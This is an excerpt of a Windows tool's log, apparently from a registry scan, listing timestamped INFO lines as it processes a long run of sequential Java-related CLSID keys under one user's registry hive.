[2016.10.18 21:01:31.227] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0006-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.227] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0006-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.227] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0007-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.227] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0007-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.227] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0007-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.227] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0008-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.227] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0008-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.227] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0008-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.227] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0009-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.227] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0009-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.227] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0009-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.228] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0010-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.228] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0010-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.228] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0010-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.228] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0011-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.228] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0011-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.228] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0011-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.228] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0012-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.228] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0012-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.228] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0012-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.228] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0013-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.228] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0013-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.229] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0013-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.229] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0014-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.229] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0014-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.229] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0014-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.229] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0015-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.229] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0015-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.229] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0015-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.229] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0016-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.229] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0016-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.229] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0016-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.229] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0017-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.230] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0017-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.230] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0017-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.230] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0018-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.230] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0018-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.230] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0018-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.230] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0019-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.230] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0019-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.230] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0019-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.230] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0020-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.230] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0020-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.230] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0020-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.231] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0021-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.231] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0021-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.231] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0021-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.231] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0022-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.231] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0022-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.231] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0022-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.231] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0023-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.231] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0023-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.231] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0023-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.231] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0024-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0024-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0024-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0025-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0025-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0025-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0026-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0026-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0026-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0027-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0027-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0027-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0028-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0028-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0028-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0029-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.232] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0029-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0029-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0030-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0030-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0030-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0031-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0031-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0031-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0032-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0032-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0032-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0033-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0033-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0033-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.233] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0034-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0034-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0034-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0035-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0035-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0035-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0036-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0036-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0036-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0037-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0037-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0037-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0038-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0038-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0038-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.234] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0039-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0039-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0039-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0040-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0040-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0040-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0041-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0041-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0041-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0042-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0042-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0042-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0043-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0043-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0043-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0044-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.235] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0044-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0044-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0045-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0045-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0045-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0046-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0046-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0046-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0047-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0047-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0047-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0048-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0048-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0048-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0049-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0049-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.236] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0049-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0050-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.237] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0050-ABCDEFFEDCBB}]
